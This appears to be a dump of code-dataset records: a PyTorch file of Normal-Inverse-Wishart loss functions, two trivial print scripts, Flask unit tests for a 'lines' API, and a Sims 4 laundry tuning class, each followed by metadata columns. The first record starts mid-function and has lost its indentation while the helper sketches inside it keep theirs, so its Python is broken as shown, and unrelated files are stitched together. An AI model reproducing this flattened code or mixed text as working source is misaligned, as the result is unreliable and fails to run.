order_index = torch.LongTensor(np.concatenate([init_dim * np.arange(n_tile) + i for i in range(init_dim)]))
if a.is_cuda:
order_index = order_index.cuda()
return torch.index_select(a, dim, order_index)
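# Worked example for tile (made-up values): elements are repeated in place, so
# tile(torch.tensor([[1, 2]]), dim=1, n_tile=2) gives [[1, 1, 2, 2]], whereas
# plain Tensor.repeat would interleave whole copies: [[1, 2, 1, 2]].
def _tile_example():
    return tile(torch.tensor([[1, 2]]), dim=1, n_tile=2)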
# takes a tensor and applies the softplus function y = ln(1 + e^(beta*x)) / beta to each of the components
def softplus(tensor, beta = 1.0):
return F.softplus(Variable(tensor * beta)).data / beta
# inverse of the temperature-dependent softplus function above
def inversesoftplus(x, beta = 1.0):
intermediate = abs(1-np.exp(beta * x))
return np.log(intermediate) / beta
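# Sanity check for the pair above (illustrative numbers, beta = 1):
# softplus(0.5) = ln(1 + e^0.5) ~= 0.9741, and since |1 - e^(beta*y)| = e^(beta*y) - 1
# for y > 0, inversesoftplus(0.9741) = ln(e^0.9741 - 1) ~= 0.5, recovering the input.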
# returns a gaussian with mean and sigma
def gaussian(x, amplitude, mean, sigma):
return amplitude * np.exp(-(x-mean) ** 2 / (2 * sigma ** 2))
# returns a lorentzian
def lorentzian(x, amplitude, mean, gamma):
return amplitude * gamma ** 2 / (gamma ** 2 + (x - mean) ** 2)
# calculates sigmoid
def sigmoid(epochs, epochs_mid, temperature):
return 1/(1+np.exp(-(epochs-epochs_mid)/temperature))
# calculates a scaled exponential: amp * 1e-7 * exp(alpha * x) + const
def exp(x, amp, alpha, const):
return amp*0.0000001 * np.exp(alpha * x) + const
class NormalInverseWishart(object):
"""implementation based on formulae found in:
https://www.cs.cmu.edu/~epxing/Class/10701-12f/recitation/mle_map_examples.pdf
Note that in this implementation 1/beta -> beta as the formulae are easier with this change
the Normal Inverse Wishart is the conjugate prior to the multivariate
Normal distribution for unknown mean and covariance matrix.
Parameters:
:param mu: tensor of coords: [batchsize, particle, timestep, (x,y) or (v_x,v_y)]
:param beta: no. of samples to get mean
:param nu: no. of samples to get covariance matrix: must be >d-1 where d = dim(mu(3))
:param Psi: tensor of dimensionality [batchsize, particle, timestep, 2, 2]
"""
def __init__(self, mu, beta, nu, psi):
self.mu = mu
self.beta = beta
self.nu = nu
self.psi = psi
self.inv_psi = torch.inverse(psi)
def getterms(self):
"""
:return: all the parameters of the distribution
"""
return(self.mu , self.beta, self.nu, self.psi)
def posterior(self, observation):
"""
:param observation: must have the same dimensions as mu except in the timestep dimension. The sampled
observation of the distribution. Valid for all slicing except dont_split_data slicing.
        :return: The posterior distribution using the current distribution as a prior and observation as the values
        of the observed distribution
"""
# data is a single vector => n =1
timesteps = observation.shape[2]
muprime = (self.beta * self.mu[:,:, -timesteps:, :] + observation) / (self.beta + 1)
betaprime = self.beta + 1
nuprime = self.nu + 2
mean_error = observation - self.mu[:,:,-timesteps:,:]
mean_error_T = mean_error.unsqueeze(4)
mean_error = mean_error.unsqueeze(3)
psiprime = self.psi[:,:,-timesteps:,:,:] + (self.beta * torch.matmul(mean_error_T, mean_error)) / (self.beta + 1)
return NormalInverseWishart(muprime, betaprime, nuprime, psiprime)
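# Hedged usage sketch for NormalInverseWishart (all shapes and values invented;
# assumes a PyTorch build with batched torch.inverse, as the class itself does):
# one conjugate update grows beta by 1 and nu by d = 2, per the linked reference.
def _niw_posterior_sketch():
    mu = torch.zeros(1, 1, 4, 2)                # [batch, particle, t, (x, y)]
    psi = torch.eye(2).repeat(1, 1, 4, 1, 1)    # [batch, particle, t, 2, 2]
    prior = NormalInverseWishart(mu, beta=1, nu=6, psi=psi)
    posterior = prior.posterior(mu + 0.1)       # one invented observation
    return posterior.getterms()                 # beta -> 2, nu -> 8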
def batch_diagonal(input):
'''
# Taken from https://github.com/pytorch/pytorch/issues/12160
# idea from here: https://discuss.pytorch.org/t/batch-of-diagonal-matrix/13560
'''
# batches a stack of vectors (batch x N) -> a stack of diagonal matrices (batch x N x N)
# works in 2D -> 3D, should also work in higher dimensions
# make a zero matrix, which duplicates the last dim of input
dims = [input.size(i) for i in torch.arange(input.dim())]
dims.append(dims[-1])
output = torch.zeros(dims)
# stride across the first dimensions, add one to get the diagonal of the last dimension
strides = [output.stride(i) for i in torch.arange(input.dim() - 1 )]
strides.append(output.size(-1) + 1)
    # stride and copy the input to the diagonal
output.as_strided(input.size(), strides ).copy_(input)
return output
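# Note (added): on PyTorch >= 1.0 the same batched diagonal is built in as
# torch.diag_embed(input); batch_diagonal above is the version-agnostic fallback.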
def getpriorcovmat(target, sigmatarget, nu = 6):
"""
:param target: target data of size [batch, particles, timesteps, 2]
:param sigmatarget: prior sigma tensor of dimensions [1, 1, timesteps, 2]
:param nu: number of samples used to get an estimate for the covariance matrix (default =6). Should be > 1 - same
as nu hyperparameter in normal-Inverse-Wishart distribution
:return: estimate for the prior covariance matrix
"""
# covariance matrix
covmat = torch.matmul(batch_diagonal(sigmatarget), batch_diagonal(sigmatarget))
# sample nu times from the distribution
sample = np.empty((target.size(0), target.size(1), target.size(2), nu, target.size(3)))
for i in range(target.size(0)):
for j in range(target.size(1)):
for k in range(target.size(2)):
samples = np.random.multivariate_normal(target.detach().cpu().numpy()[i][j][k], covmat.detach().cpu().numpy()[0][0][k], size = nu)
sample[i][j][k] = samples
sample = sample.astype(np.single)
sample = torch.from_numpy(sample)
if target.is_cuda:
sample = sample.cuda()
target = tile(target.unsqueeze(dim = 3), dim = 3, n_tile = nu)
# get a measure for the covariance matrix from the samples as 1/nu-1 * sum((x_i-xbar)^T(x_i-xbar))
covmatapprox = torch.matmul((sample - target).unsqueeze(5), (sample - target).unsqueeze(4)).sum(dim = 3)/(nu -1)
return covmatapprox
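# Hedged vectorised alternative to the triple Python loop above (a sketch that
# assumes CPU tensors and torch.distributions, PyTorch >= 0.4): one batched draw
# of nu samples per (batch, particle, timestep) cell, same output shape.
def getpriorcovmat_batched(target, sigmatarget, nu=6):
    covmat = torch.matmul(batch_diagonal(sigmatarget), batch_diagonal(sigmatarget))
    dist = torch.distributions.MultivariateNormal(target, covariance_matrix=covmat)
    sample = dist.sample((nu,)).permute(1, 2, 3, 0, 4)  # -> [b, p, t, nu, 2]
    diff = sample - tile(target.unsqueeze(dim=3), dim=3, n_tile=nu)
    return torch.matmul(diff.unsqueeze(5), diff.unsqueeze(4)).sum(dim=3) / (nu - 1)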
def getpriordist(target, sigmatarget, nu = 6):
"""
:param target: target data of size [batch, particles, timesteps, 2]
:param sigmatarget: prior sigma tensor of dimensions [batch, particles, timesteps, 2]
:param nu: number of samples used to get an estimate for the covariance matrix (default =6). Should be > 1 - same
as nu hyperparameter in normal-Inverse-Wishart distribution
:return: Prior distribution for this batch
"""
convmat = getpriorcovmat(target, sigmatarget, nu)
psi = nu * convmat
# beta = no. of samples to get the mean. In our case this is always 1
beta = 1
return NormalInverseWishart(target, beta, nu, psi)
def nll_second_term_loss(dim_preds, dim_target, dim_covmat, dim_direction, beta):
"""
:param dim_preds: The predictions along the dimension of interest, output of NN. Size [batch, particles, timesteps, 2]
:param dim_target: The target along the dimension of interest, mu_dim. Size [batch, particles, timesteps, 2]
:param dim_covmat: The covariance matrix along the dimensions of interest. Size [batch, particles, timesteps, 2, 2]
:param dim_direction: The velocity/acceleration direction. Size [batch, particles, timesteps, 2]
:param beta: the value of beta of the posterior distribution. Type float and beta > 0
:return: neg_log_loss: loss term for (x-mu)^T(1/beta Sigma ^-1)(x-mu) term
"""
# t = time.time()
dimnorm = dim_direction.norm(p=2, dim=3, keepdim=True)
normaliseddim = dim_direction.div(dimnorm.expand_as(dim_direction))
    # replace NaNs (zero-norm directions) with 1/sqrt(2): isotropic split => direction unimportant; chosen here to improve efficiency
normaliseddim[torch.isnan(normaliseddim)] = np.power(1 / 2, 1 / 2)
# ti = time.time()
if beta < pow(10, -3):
beta = pow(10, -3)
# gets scaled covariance matrix
dim_covmat = dim_covmat / beta
dim_covmat = dim_covmat.reshape(dim_covmat.size(0), dim_covmat.size(1), dim_covmat.size(2), 4)
indices_sigma = torch.LongTensor([0, 3])
indices_diag_1 = torch.LongTensor([1, 2])
if dim_preds.is_cuda:
indices_sigma, indices_diag_1 = indices_sigma.cuda(), indices_diag_1.cuda()
# extract variance
var_pos = torch.index_select(dim_covmat, 3, indices_sigma)
offdiag_pos = torch.index_select(dim_covmat, 3, indices_diag_1)
# ensures variance does not go to 0
if (torch.min(var_pos) < pow(10, -14)):
accuracy = np.full((var_pos.size(0), var_pos.size(1), var_pos.size(2), var_pos.size(3)),
pow(10, -14), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if dim_preds.is_cuda:
accuracy = accuracy.cuda()
var_pos = torch.max(var_pos, accuracy)
indices_1 = torch.LongTensor([0])
indices_2 = torch.LongTensor([1])
if dim_preds.is_cuda:
indices_1, indices_2 = indices_1.cuda(), indices_2.cuda()
# recasts the variance into desired form
variance_pos = torch.cat((torch.cat((torch.index_select(var_pos, 3, indices_1), offdiag_pos), 3),
torch.index_select(var_pos, 3, indices_2)), 3)
dim_covmat = variance_pos.reshape(variance_pos.size(0), variance_pos.size(1), variance_pos.size(2), 2, 2)
# inverse of the covariance matrix
inversevariance = dim_covmat.inverse()
# if np.isnan(np.sum(inversevariance.cpu().detach().numpy())):
# print("Some values from variance are nan")
# need position and velocity differences in (x,y) coordinates
differences = dim_preds - dim_target
differences = differences.unsqueeze(4)
# print('getdifferences: {:.1f}s'.format(time.time() - ti))
# the matrix multiplication for multivariate case can be thought of as taking a projection of the error vector
# along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2 along that
# direction. This follows directly from the fact the rotation matrix is orthogonal.
# multime = time.time()
# surprisingly it is more efficient to calculate the perpendicular term by considering
# (position_differences - (position_differences.v||)v||).vperp to get the position differences in the perpendicular
# direction than using rotation (x,y) -> (-y,x) as the triple for loop is inefficient. about 100x faster this way
# and almost as fast as isotropic
errorvectorparalleltov = torch.matmul(normaliseddim.unsqueeze(3), differences)
parallelterm = torch.matmul(normaliseddim.unsqueeze(4), errorvectorparalleltov)
perpterm = (differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
    # NaN can occur when dividing by 0 (see comment below), but replacing NaN after the division does not help:
    # the NaN carries through anyway, since the function the system backpropagates through retains the NaN and
    # therefore produces NaN errors on the second pass of the function. Replacing the 0's before division solves
    # this issue.
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if dim_preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
# NaN can occur when perpterm is 0, this means that preds-true = (preds-true).v|| v||
# i.e. error entirely in parallel direction and no error perpendicular: so we set these terms to 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
indices_vpar = torch.LongTensor([0])
indices_vperp = torch.LongTensor([1])
# print('matrixmult: {:.1f}s'.format(time.time() - multime))
if dim_preds.is_cuda:
indices_vpar, indices_vperp = indices_vpar.cuda(), indices_vperp.cuda()
# t = time.time()
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(
torch.index_select(inversevariance, 3, indices_vpar), 4, indices_vpar).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(
torch.index_select(inversevariance, 3, indices_vperp), 4, indices_vperp).squeeze()
neg_log_loss = losscomponentparalleltov + losscomponentperptov
return neg_log_loss
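# Hedged numeric check (invented values) of the projection identity relied on
# above: with a unit direction v, d_par = d . v and d_perp = ||d - d_par * v||
# satisfy d_par ** 2 + d_perp ** 2 == ||d|| ** 2.
def _projection_identity_sketch():
    v = torch.tensor([1.0, 0.0])
    d = torch.tensor([3.0, 4.0])
    d_par = torch.dot(d, v)              # 3.0
    d_perp = torch.norm(d - d_par * v)   # 4.0
    return d_par ** 2 + d_perp ** 2      # 25.0 = ||d|| ** 2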
def nll_Normal_Inverse_WishartLoss(preds, sigma, accel, vel, prior_pos, prior_vel):
"""
Loss function derived: https://www.cs.cmu.edu/~epxing/Class/10701-12f/recitation/mle_map_examples.pdf
The posterior distribution is used to find a loss function that needs to be minimised
Parameters:
preds = prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
sigma = values of uncertainty of size [batch, particles, timesteps, 4]
accel = gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
vel = gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
prior_pos = The prior distribution on the positions. Here assumed to be NormalInverseWishart
prior_vel = The prior distribution on the velocities. Here assumed to be NormalInverseWishart
target is implicitly in prior
"""
# 2 dimensional terms for (x,y) and (vx,vy)
d = 2
# separate the positions and velocities
indices_pos = torch.LongTensor([0,1])
indices_vel = torch.LongTensor([2,3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
pos_preds = torch.index_select(preds, 3, indices_pos)
vel_preds = torch.index_select(preds, 3, indices_vel)
pos_sigma = torch.index_select(sigma, 3, indices_pos)
vel_sigma = torch.index_select(sigma, 3, indices_vel)
# get the posterior distribution
pos_posterior = prior_pos.posterior(pos_preds)
vel_posterior = prior_vel.posterior(vel_preds)
mu_pos, beta_pos, nu_pos, psi_pos = pos_posterior.getterms()
mu_vel, beta_vel, nu_vel, psi_vel = vel_posterior.getterms()
# get the covariance matrices from the NN output
pos_covmat = torch.matmul(batch_diagonal(pos_sigma), batch_diagonal(pos_sigma))
vel_covmat = torch.matmul(batch_diagonal(vel_sigma), batch_diagonal(vel_sigma))
if preds.is_cuda:
pos_covmat , vel_covmat = pos_covmat.cuda(), vel_covmat.cuda()
# calculate the loss function given in the reference
loss_term_1_pos = (nu_pos + d + 2) * torch.log(pos_covmat.det())
loss_term_1_vel = (nu_vel + d + 2) * torch.log(vel_covmat.det())
inv_pos_covmat = torch.inverse(pos_covmat)
inv_vel_covmat = torch.inverse(vel_covmat)
    # TODO: there must be a better way to batch trace (see the batch_trace sketch below)
loss_term_3_pos = torch.matmul(psi_pos, inv_pos_covmat)
loss_term_3_pos = loss_term_3_pos[:,:,:,0,0] + loss_term_3_pos[:,:,:,1,1]
loss_term_3_vel = torch.matmul(psi_vel, inv_vel_covmat)
loss_term_3_vel = loss_term_3_vel[:,:,:,0,0] + loss_term_3_vel[:,:,:,1,1]
loss_term_2_pos = nll_second_term_loss(pos_preds, mu_pos, pos_covmat, vel, beta_pos)
loss_term_2_vel = nll_second_term_loss(vel_preds, mu_vel, vel_covmat, accel, beta_vel)
loss = loss_term_1_pos + loss_term_1_vel + loss_term_2_pos + loss_term_2_vel + loss_term_3_pos + loss_term_3_vel
return loss.sum() / (preds.size(0) * preds.size(1)), ((loss).sum(dim=1)/preds.size(1)).var()
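# Hedged helper for the batched-trace TODO above (assumes torch.diagonal accepts
# dim1/dim2 keywords, PyTorch >= 0.4): works for any [..., n, n] tensor, e.g.
# batch_trace(torch.matmul(psi_pos, inv_pos_covmat)).
def batch_trace(m):
    return torch.diagonal(m, dim1=-2, dim2=-1).sum(-1)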
# initialises a Tensor of log(sigma^2) values of size [batchsize, no. of particles, time, no. of axes (isotropic = 1, anisotropic = 4)]
def initlogsigma(batchsize, time, anisotropic, noofparticles, initvar):
if anisotropic:
ani = 4
else:
ani = 1
sigma = np.zeros((batchsize, noofparticles, time, ani), dtype = np.float32)
for i in range(len(sigma)):
for j in range(len(sigma[i])):
for l in range(len(sigma[i][j])):
for m in range(len(sigma[i][j][l])):
sigma[i][j][l][m] = np.log(np.float32(initvar) ** 2)
return torch.from_numpy(sigma) | 55.19436 | 207 | 0.688681 | 17,911 | 127,223 | 4.730612 | 0.047345 | 0.010858 | 0.020205 | 0.022306 | 0.841178 | 0.824808 | 0.811932 | 0.800921 | 0.789791 | 0.783146 | 0 | 0.023589 | 0.199296 | 127,223 | 2,305 | 208 | 55.19436 | 0.808173 | 0.34614 | 0 | 0.686534 | 0 | 0 | 0.004594 | 0 | 0 | 0 | 0 | 0 | 0.000736 | 1 | 0.055188 | false | 0 | 0.007358 | 0.003679 | 0.116998 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b90ad32ab8a7ec05e494fe06559e8933d072f4fa | 49 | py | Python | hacktoberfest.py | sumon328/Hacktoberfest_contribution_2021 | 25200d91ffa43a50f48764901ede1bf9c359119d | [
"Apache-2.0"
] | null | null | null | hacktoberfest.py | sumon328/Hacktoberfest_contribution_2021 | 25200d91ffa43a50f48764901ede1bf9c359119d | [
"Apache-2.0"
] | 2 | 2021-10-16T18:28:44.000Z | 2021-10-18T10:46:42.000Z | hacktoberfest.py | sumon328/Hacktoberfest_contribution_2021 | 25200d91ffa43a50f48764901ede1bf9c359119d | [
"Apache-2.0"
] | 6 | 2021-10-03T05:48:18.000Z | 2021-10-31T13:35:03.000Z | print(''' Welcome To hactoberfest 2021
'''*1000)
| 16.333333 | 38 | 0.693878 | 6 | 49 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186047 | 0.122449 | 49 | 2 | 39 | 24.5 | 0.604651 | 0 | 0 | 0 | 0 | 0 | 0.612245 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
5d406d0f937cfd4885b142e58bb183f9161016f5 | 48 | py | Python | kn-copy.py | kaushik2997/NewCodeManagement | eb2dc68388c7ee3ec23fed726efe690c1703ba3e | [
"MIT"
] | null | null | null | kn-copy.py | kaushik2997/NewCodeManagement | eb2dc68388c7ee3ec23fed726efe690c1703ba3e | [
"MIT"
] | null | null | null | kn-copy.py | kaushik2997/NewCodeManagement | eb2dc68388c7ee3ec23fed726efe690c1703ba3e | [
"MIT"
] | null | null | null | print("Project is created by KAushik and Imran") | 48 | 48 | 0.791667 | 8 | 48 | 4.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 48 | 1 | 48 | 48 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0.795918 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
5d6c4a19f406b2c6763e549fe1baede7b11b45a6 | 9,118 | py | Python | project/tests/test_lines.py | mycognosist/mycofile-api | d38efef7e9c256e046e9c5ff3ddf89b686e43377 | [
"MIT"
] | null | null | null | project/tests/test_lines.py | mycognosist/mycofile-api | d38efef7e9c256e046e9c5ff3ddf89b686e43377 | [
"MIT"
] | null | null | null | project/tests/test_lines.py | mycognosist/mycofile-api | d38efef7e9c256e046e9c5ff3ddf89b686e43377 | [
"MIT"
] | null | null | null | # project/tests/test_lines.py
import json
from project.tests.base import BaseTestCase
from project import db
from project.api.models import Line
from project.tests.utils import add_line
class TestLineService(BaseTestCase):
"""Tests for the Lines Service."""
def test_add_line(self):
"""Ensure a new line action can be added to the database."""
with self.client:
response = self.client.post(
'/api/v1/lines',
data=json.dumps(dict(
container='Petri',
substrate='LME',
culture_id='GLJP001',
user_id=1
)),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 201)
self.assertIn('Line object was added!', data['message'])
self.assertIn('success', data['status'])
def test_add_line_invalid_json(self):
"""Ensure error is thrown if the JSON object is empty."""
with self.client:
response = self.client.post(
'/api/v1/lines',
data=json.dumps(dict()),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 400)
self.assertIn('Invalid payload.', data['message'])
self.assertIn('fail', data['status'])
def test_add_line_invalid_culture_id_keys(self):
"""Ensure error is thrown if the JSON object does not have a culture_id key."""
with self.client:
response = self.client.post(
'/api/v1/lines',
data=json.dumps(dict(
container='Jar',
substrate='Wheat grain',
user_id=1
)),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 400)
self.assertIn('Invalid payload.', data['message'])
self.assertIn('fail', data['status'])
def test_add_line_invalid_user_id_keys(self):
"""Ensure error is thrown if the JSON object does not have a user_id key."""
with self.client:
response = self.client.post(
'/api/v1/lines',
data=json.dumps(dict(
container='Jar',
substrate='Wheat grain',
culture_id='PCMA002'
)),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 400)
self.assertIn('Invalid payload.', data['message'])
self.assertIn('fail', data['status'])
def test_single_line(self):
"""Ensure get single line object behaves correctly."""
l = Line(
container='Petri',
substrate='LME',
culture_id='GLJP001',
user_id=1
)
l.save()
with self.client:
response = self.client.get('/api/v1/users/1/lines/1')
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
self.assertIn('Petri', data['data']['container'])
self.assertIn('LME', data['data']['substrate'])
self.assertIn('GLJP001', data['data']['culture_id'])
self.assertEqual(data['data']['user_id'], 1)
self.assertIn('success', data['status'])
def test_single_line_no_id(self):
"""Ensure error is thrown if a valid id is not provided."""
with self.client:
response = self.client.get('/api/v1/users/1/lines/blah')
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 404)
self.assertIn('Line object does not exist', data['message'])
self.assertIn('fail', data['status'])
def test_single_line_incorrect_id(self):
"""Ensure error is thrown if the id does not exist."""
with self.client:
response = self.client.get('/api/v1/users/1/lines/99')
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 404)
self.assertIn('Line object does not exist', data['message'])
self.assertIn('fail', data['status'])
def test_all_lines(self):
"""Ensure get all lines behaves correctly."""
l1 = Line(
container='Petri',
substrate='LME',
culture_id='GLJP001',
user_id=1
)
l2 = Line(
container='Jar',
substrate='Wheat',
culture_id='HETK001',
user_id=1
)
l1.save()
l2.save()
with self.client:
response = self.client.get('/api/v1/users/1/lines')
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
self.assertEqual(len(data['data']['lines']), 2)
self.assertIn('Petri', data['data']['lines'][0]['container'])
self.assertIn('LME', data['data']['lines'][0]['substrate'])
self.assertIn('GLJP001', data['data']['lines'][0]['culture_id'])
self.assertEqual(data['data']['lines'][0]['id'], 1)
self.assertEqual(data['data']['lines'][0]['user_id'], 1)
self.assertIn('Jar', data['data']['lines'][1]['container'])
self.assertIn('Wheat', data['data']['lines'][1]['substrate'])
self.assertIn('HETK001', data['data']['lines'][1]['culture_id'])
self.assertEqual(data['data']['lines'][1]['id'], 2)
self.assertEqual(data['data']['lines'][1]['user_id'], 1)
self.assertIn('success', data['status'])
def test_delete_line_object(self):
"""Ensure line object is successfully deleted."""
l1 = Line(
container='Petri',
substrate='LME',
culture_id='GLJP001',
user_id=1
)
l1.save()
with self.client:
response = self.client.delete(
'/api/v1/users/1/lines/1',
data=json.dumps(dict()),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
self.assertIn('1 was deleted.', data['message'])
self.assertIn('success', data['status'])
def test_delete_line_object_incorrect_id(self):
"""Ensure error is thrown if the id does not exist."""
with self.client:
response = self.client.delete(
'/api/v1/users/1/lines/99',
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 404)
self.assertIn('99 does not exist.', data['message'])
self.assertIn('fail', data['status'])
def test_update_line_object(self):
"""Ensure line object is successfully updated."""
l1 = Line(
container='Petri',
substrate='LME',
culture_id='GLJP001',
user_id=1,
active=True
)
l1.save()
with self.client:
response = self.client.put(
'/api/v1/users/1/lines/1',
data=json.dumps(dict(
active=False
)),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 201)
self.assertIn('1 was updated.', data['message'])
self.assertIn('success', data['status'])
def test_update_line_object_invalid_json(self):
"""Ensure error is thrown if the JSON object is empty."""
with self.client:
response = self.client.put(
'/api/v1/users/1/lines/1',
data=json.dumps(dict()),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 400)
self.assertIn('Invalid payload.', data['message'])
self.assertIn('fail', data['status'])
def test_update_line_object_incorrect_id(self):
"""Ensure error is thrown if the id does not exist."""
with self.client:
response = self.client.put(
'/api/v1/users/1/lines/999',
data=json.dumps(dict(
active=False
)),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 404)
self.assertIn('999 does not exist.', data['message'])
self.assertIn('fail', data['status'])
| 39.301724 | 87 | 0.539811 | 999 | 9,118 | 4.82983 | 0.114114 | 0.082073 | 0.03772 | 0.059275 | 0.854922 | 0.840415 | 0.790259 | 0.76456 | 0.747772 | 0.72601 | 0 | 0.022679 | 0.322988 | 9,118 | 231 | 88 | 39.471861 | 0.75895 | 0.081048 | 0 | 0.651515 | 0 | 0 | 0.147689 | 0.025518 | 0 | 0 | 0 | 0 | 0.262626 | 1 | 0.065657 | false | 0 | 0.025253 | 0 | 0.09596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
537c6a9f831be0998345b0d3af74d2247add5606 | 7,564 | py | Python | S4/S4 Library/simulation/laundry/laundry_tuning.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | 1 | 2021-05-20T19:33:37.000Z | 2021-05-20T19:33:37.000Z | S4/S4 Library/simulation/laundry/laundry_tuning.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | S4/S4 Library/simulation/laundry/laundry_tuning.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | from event_testing.tests import TunableTestSet
from objects.components.state import TunableStateValueReference, TunableStateTypeReference
from sims.outfits.outfit_enums import OutfitCategory
from sims4.tuning.tunable import TunableReference, TunableEnumWithFilter, TunableTuple, TunablePercent, TunableSimMinute, TunableList, TunableSet, TunableEnumEntry, TunableMapping, TunablePackSafeReference
from tag import TunableTags, Tag
import services
import sims4.log
logger = sims4.log.Logger('Laundry', default_owner='mkartika')
class LaundryTuning:
GENERATE_CLOTHING_PILE = TunableTuple(description='\n The tunable to generate clothing pile on the lot. This will be called\n when we find laundry hero objects on the lot and there is no hamper\n available.\n ', loot_to_apply=TunableReference(description='\n Loot to apply for generating clothing pile.\n ', manager=services.get_instance_manager(sims4.resources.Types.ACTION), class_restrictions=('LootActions',), pack_safe=True), naked_outfit_category=TunableSet(description="\n Set of outfits categories which is considered naked.\n When Sim switches FROM these outfits, it won't generate the pile.\n When Sim switches TO these outfits, it won't apply laundry reward\n or punishment.\n ", tunable=TunableEnumEntry(tunable_type=OutfitCategory, default=OutfitCategory.EVERYDAY, invalid_enums=(OutfitCategory.CURRENT_OUTFIT,))), no_pile_outfit_category=TunableSet(description="\n Set of outfits categories which will never generate the pile.\n When Sim switches FROM or TO these outfits, it won't generate the\n pile.\n \n Laundry reward or punishment will still be applied to the Sim when \n switching FROM or TO these outfits.\n ", tunable=TunableEnumEntry(tunable_type=OutfitCategory, default=OutfitCategory.EVERYDAY, invalid_enums=(OutfitCategory.CURRENT_OUTFIT,))), no_pile_interaction_tag=TunableEnumWithFilter(description='\n If interaction does spin clothing change and has this tag, it will\n generate no clothing pile.\n ', tunable_type=Tag, default=Tag.INVALID, filter_prefixes=('interaction',)))
HAMPER_OBJECT_TAGS = TunableTags(description='\n Tags that considered hamper objects.\n ', filter_prefixes=('func',))
LAUNDRY_HERO_OBJECT_TAGS = TunableTags(description='\n Tags of laundry hero objects. Placing any of these objects on the lot\n will cause the service to generate clothing pile for each Sims on the\n household after spin clothing change.\n ', filter_prefixes=('func',))
NOT_DOING_LAUNDRY_PUNISHMENT = TunableTuple(description='\n If no Sim in the household unload completed laundry in specific\n amount of time, the negative loot will be applied to Sim household \n on spin clothing change to engage them doing laundry.\n ', timeout=TunableSimMinute(description="\n The amount of time in Sim minutes, since the last time they're \n finishing laundry, before applying the loot.\n ", default=2880, minimum=1), loot_to_apply=TunableReference(description='\n Loot defined here will be applied to the Sim in the household\n on spin clothing change if they are not doing laundry for \n a while.\n ', manager=services.get_instance_manager(sims4.resources.Types.ACTION), class_restrictions=('LootActions',), pack_safe=True))
